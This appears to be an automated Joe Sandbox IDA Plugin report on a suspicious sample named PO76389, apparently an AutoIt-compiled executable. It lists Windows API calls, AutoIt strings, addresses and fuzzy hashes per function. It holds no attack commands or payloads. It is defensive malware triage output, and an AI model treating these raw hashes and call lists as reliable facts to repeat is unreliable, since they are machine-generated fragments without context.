                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                    • Instruction ID: 6278b46532a002930161354ec8d8fb71763622f11a0aca5ff934a780a6edf616
                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                    • Instruction Fuzzy Hash: C9C1D37220519349DF2D463A843463FBBA15EB27B170A076FE4B3CB7C5EE28D524E624
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 0050A7A5
                                                    • DeleteObject.GDI32(00000000), ref: 0050A7B7
                                                    • DestroyWindow.USER32 ref: 0050A7C5
                                                    • GetDesktopWindow.USER32 ref: 0050A7DF
                                                    • GetWindowRect.USER32(00000000), ref: 0050A7E6
                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0050A927
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0050A937
                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050A97F
                                                    • GetClientRect.USER32(00000000,?), ref: 0050A98B
                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0050A9C5
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050A9E7
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050A9FA
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050AA05
                                                    • GlobalLock.KERNEL32(00000000), ref: 0050AA0E
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050AA1D
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0050AA26
                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050AA2D
                                                    • GlobalFree.KERNEL32(00000000), ref: 0050AA38
                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 0050AA4A
                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0053D9BC,00000000), ref: 0050AA60
                                                    • GlobalFree.KERNEL32(00000000), ref: 0050AA70
                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0050AA96
                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0050AAB5
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050AAD7
                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050ACC4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                    • API String ID: 2211948467-2373415609
                                                    • Opcode ID: 009e351fe8698f42d1c2e9b0430603557b428c53219328f547ab14c662eb64ec
                                                    • Instruction ID: 667cc70ef0b1ab01f2f116d96bac7fbc1ee22238ee621c8ec065c052a203ee14
                                                    • Opcode Fuzzy Hash: 009e351fe8698f42d1c2e9b0430603557b428c53219328f547ab14c662eb64ec
                                                    • Instruction Fuzzy Hash: 62027B75A00218EFDB14DFA8DC89EAE7BB9FF48310F008119F915AB2A1D734AD45DB60
                                                    APIs
                                                    • SetTextColor.GDI32(?,00000000), ref: 0051D0EB
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0051D11C
                                                    • GetSysColor.USER32(0000000F), ref: 0051D128
                                                    • SetBkColor.GDI32(?,000000FF), ref: 0051D142
                                                    • SelectObject.GDI32(?,00000000), ref: 0051D151
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0051D17C
                                                    • GetSysColor.USER32(00000010), ref: 0051D184
                                                    • CreateSolidBrush.GDI32(00000000), ref: 0051D18B
                                                    • FrameRect.USER32(?,?,00000000), ref: 0051D19A
                                                    • DeleteObject.GDI32(00000000), ref: 0051D1A1
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0051D1EC
                                                    • FillRect.USER32(?,?,00000000), ref: 0051D21E
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0051D249
                                                      • Part of subcall function 0051D385: GetSysColor.USER32(00000012), ref: 0051D3BE
                                                      • Part of subcall function 0051D385: SetTextColor.GDI32(?,?), ref: 0051D3C2
                                                      • Part of subcall function 0051D385: GetSysColorBrush.USER32(0000000F), ref: 0051D3D8
                                                      • Part of subcall function 0051D385: GetSysColor.USER32(0000000F), ref: 0051D3E3
                                                      • Part of subcall function 0051D385: GetSysColor.USER32(00000011), ref: 0051D400
                                                      • Part of subcall function 0051D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0051D40E
                                                      • Part of subcall function 0051D385: SelectObject.GDI32(?,00000000), ref: 0051D41F
                                                      • Part of subcall function 0051D385: SetBkColor.GDI32(?,00000000), ref: 0051D428
                                                      • Part of subcall function 0051D385: SelectObject.GDI32(?,?), ref: 0051D435
                                                      • Part of subcall function 0051D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0051D454
                                                      • Part of subcall function 0051D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0051D46B
                                                      • Part of subcall function 0051D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0051D480
                                                      • Part of subcall function 0051D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0051D4A8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 3521893082-0
                                                    • Opcode ID: 6e474d42d514b702bdd6a2a026d24bd9ef0a148f4f314d17a0a4b7fd851bb407
                                                    • Instruction ID: 389a50723e955cca1da23e3a852b1967d9c1b75851f0c083c7639572d817a11a
                                                    • Opcode Fuzzy Hash: 6e474d42d514b702bdd6a2a026d24bd9ef0a148f4f314d17a0a4b7fd851bb407
                                                    • Instruction Fuzzy Hash: F391A372408301BFDB109F64EC48E6BBBB9FF99321F100A19F962962E0D771D948DB61
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 0050A42A
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0050A4E9
                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0050A527
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0050A539
                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0050A57F
                                                    • GetClientRect.USER32(00000000,?), ref: 0050A58B
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0050A5CF
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0050A5DE
                                                    • GetStockObject.GDI32(00000011), ref: 0050A5EE
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0050A5F2
                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0050A602
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0050A60B
                                                    • DeleteDC.GDI32(00000000), ref: 0050A614
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0050A642
                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0050A659
                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0050A694
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0050A6A8
                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0050A6B9
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0050A6E9
                                                    • GetStockObject.GDI32(00000011), ref: 0050A6F4
                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0050A6FF
                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0050A709
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: 06430b6eec49837a0b41fc7c0ac686bb44238c61abf9b9ec8a85f0c4fa52ac4c
                                                    • Instruction ID: 2c76c3185ea3b3c6a58ba32e674248ad75713783da03fb2387bf439495dd9b0a
                                                    • Opcode Fuzzy Hash: 06430b6eec49837a0b41fc7c0ac686bb44238c61abf9b9ec8a85f0c4fa52ac4c
                                                    • Instruction Fuzzy Hash: AEA1AD75A00614BFEB14DBA9DC8AFAE7BB9FB04710F004119FA14A72E0D7B4AD44DB64
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 004FE45E
                                                    • GetDriveTypeW.KERNEL32(?,0054DC88,?,\\.\,0054DBF0), ref: 004FE54B
                                                    • SetErrorMode.KERNEL32(00000000,0054DC88,?,\\.\,0054DBF0), ref: 004FE6B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                    • API String ID: 2907320926-4222207086
                                                    • Opcode ID: 425b3c0b392ca1033afb56f5ac33e9519675c43c6e286086c9f1cea0767f2d67
                                                    • Instruction ID: 63524cbcb6dcb30a50da728b048f6748c260a89a3efe9d50101f046c94401960
                                                    • Opcode Fuzzy Hash: 425b3c0b392ca1033afb56f5ac33e9519675c43c6e286086c9f1cea0767f2d67
                                                    • Instruction Fuzzy Hash: 6051A53024430DABD300DF16C89187ABBA1BFA4709B90491FF646D72B1D669DF47DA4B
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 1038674560-86951937
                                                    • Opcode ID: 4b6e5c60918930e68f4f93f3cf273821bf7af2ce1f8948eebc1ba43e7d547281
                                                    • Instruction ID: 37831aab6a089d47b5f78cdcb01e5e23c1876fa96cd8d11d30e1bb0b19fd9699
                                                    • Opcode Fuzzy Hash: 4b6e5c60918930e68f4f93f3cf273821bf7af2ce1f8948eebc1ba43e7d547281
                                                    • Instruction Fuzzy Hash: 7461F63164021277DB21BA259DD2FFA3668BF16748F14002BFD45A72C2EF9CDA01C6B9
                                                    APIs
                                                    • DestroyWindow.USER32 ref: 004B4956
                                                    • DeleteObject.GDI32(00000000), ref: 004B4998
                                                    • DeleteObject.GDI32(00000000), ref: 004B49A3
                                                    • DestroyCursor.USER32(00000000), ref: 004B49AE
                                                    • DestroyWindow.USER32(00000000), ref: 004B49B9
                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0052E179
                                                    • 6F7A0200.COMCTL32(?,000000FF,?), ref: 0052E1B2
                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0052E5E0
                                                      • Part of subcall function 004B49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004B4954,00000000), ref: 004B4A23
                                                    • SendMessageW.USER32 ref: 0052E627
                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0052E63E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: DestroyMessageSendWindow$DeleteObject$A0200CursorInvalidateMoveRect
                                                    • String ID: 0
                                                    • API String ID: 377055139-4108050209
                                                    • Opcode ID: b3a14bdc2f51177066946eb12f73a05376615829cebaa39fa3a73c5b03847376
                                                    • Instruction ID: cb427c885071078c00a2aa69d72df63eb6a5d19612b5154ab0d6f6e38e4ac071
                                                    • Opcode Fuzzy Hash: b3a14bdc2f51177066946eb12f73a05376615829cebaa39fa3a73c5b03847376
                                                    • Instruction Fuzzy Hash: 7E12C370200221DFDB25CF24E886BAABBF5BF56304F144569F559CB292C731EC46DBA1
                                                    APIs
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0051C598
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0051C64E
                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 0051C669
                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0051C925
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: 0
                                                    • API String ID: 2326795674-4108050209
                                                    • Opcode ID: 0dc755507acc21daea0f0552d2bf236c4f2d272471e33da680729eeb4e47fe5e
                                                    • Instruction ID: 98ef98132f477de03a39c8de4ccdf436a1df1b2710e9ac86a2a4acb8d2b4669d
                                                    • Opcode Fuzzy Hash: 0dc755507acc21daea0f0552d2bf236c4f2d272471e33da680729eeb4e47fe5e
                                                    • Instruction Fuzzy Hash: E4F1EF71184301AFE7118F24C889BEABFF4FF49754F080A2DF599962A1C776D884DB92
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,0054DBF0), ref: 00516245
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                    • API String ID: 3964851224-45149045
                                                    • Opcode ID: 665d95513fb3ece901a7dab9aaf663ce78f3e78e8222f2f228853d8e126c4930
                                                    • Instruction ID: e26c6d12936d3ba9b979f3f809c5e07974a8a0b50f6c7d1beaa7c65fad437c05
                                                    • Opcode Fuzzy Hash: 665d95513fb3ece901a7dab9aaf663ce78f3e78e8222f2f228853d8e126c4930
                                                    • Instruction Fuzzy Hash: FFC188342042018BDB04EF15C451BAE7BD6BF94398F44486EB8425B3D6DB39DD8BCB56
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 0051D3BE
                                                    • SetTextColor.GDI32(?,?), ref: 0051D3C2
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0051D3D8
                                                    • GetSysColor.USER32(0000000F), ref: 0051D3E3
                                                    • CreateSolidBrush.GDI32(?), ref: 0051D3E8
                                                    • GetSysColor.USER32(00000011), ref: 0051D400
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0051D40E
                                                    • SelectObject.GDI32(?,00000000), ref: 0051D41F
                                                    • SetBkColor.GDI32(?,00000000), ref: 0051D428
                                                    • SelectObject.GDI32(?,?), ref: 0051D435
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0051D454
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0051D46B
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0051D480
                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0051D4A8
                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0051D4CF
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0051D4ED
                                                    • DrawFocusRect.USER32(?,?), ref: 0051D4F8
                                                    • GetSysColor.USER32(00000011), ref: 0051D506
                                                    • SetTextColor.GDI32(?,00000000), ref: 0051D50E
                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0051D522
                                                    • SelectObject.GDI32(?,0051D0B5), ref: 0051D539
                                                    • DeleteObject.GDI32(?), ref: 0051D544
                                                    • SelectObject.GDI32(?,?), ref: 0051D54A
                                                    • DeleteObject.GDI32(?), ref: 0051D54F
                                                    • SetTextColor.GDI32(?,?), ref: 0051D555
                                                    • SetBkColor.GDI32(?,?), ref: 0051D55F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 1996641542-0
                                                    • Opcode ID: 15ed6648582924ef19d03a591e28e306d7d79b7466a3414a37d7747bb4270155
                                                    • Instruction ID: 52dfc6dc0ed13f9c3528ca3a5f6324a9eac203098cf61045a43fdfb628572148
                                                    • Opcode Fuzzy Hash: 15ed6648582924ef19d03a591e28e306d7d79b7466a3414a37d7747bb4270155
                                                    • Instruction Fuzzy Hash: E2513D72900218AFDF109FA4EC48EEE7BB9FB18320F104515F915AB2A1D7759944DB60
                                                    APIs
                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0051B5C0
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0051B5D1
                                                    • CharNextW.USER32(0000014E), ref: 0051B600
                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0051B641
                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0051B657
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0051B668
                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0051B685
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0051B6D7
                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0051B6ED
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0051B71E
                                                    • _memset.LIBCMT ref: 0051B743
                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0051B78C
                                                    • _memset.LIBCMT ref: 0051B7EB
                                                    • SendMessageW.USER32 ref: 0051B815
                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0051B86D
                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 0051B91A
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0051B93C
                                                    • GetMenuItemInfoW.USER32(?), ref: 0051B986
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0051B9B3
                                                    • DrawMenuBar.USER32(?), ref: 0051B9C2
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0051B9EA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                    • String ID: 0
                                                    • API String ID: 1073566785-4108050209
                                                    • Opcode ID: 80a169727819121f3446e4630d00c319a532b5167553780272d240f4dc380073
                                                    • Instruction ID: 4bb2f065eae7e7022afd1f2783c071f5cfd9ba7d8cf2d6aaa3058c8d1bd0349f
                                                    • Opcode Fuzzy Hash: 80a169727819121f3446e4630d00c319a532b5167553780272d240f4dc380073
                                                    • Instruction Fuzzy Hash: 45E18B71900218AAFF209F51DC85EEE7FB9FF05714F10815AF929AB290DB748A84DF60
                                                    APIs
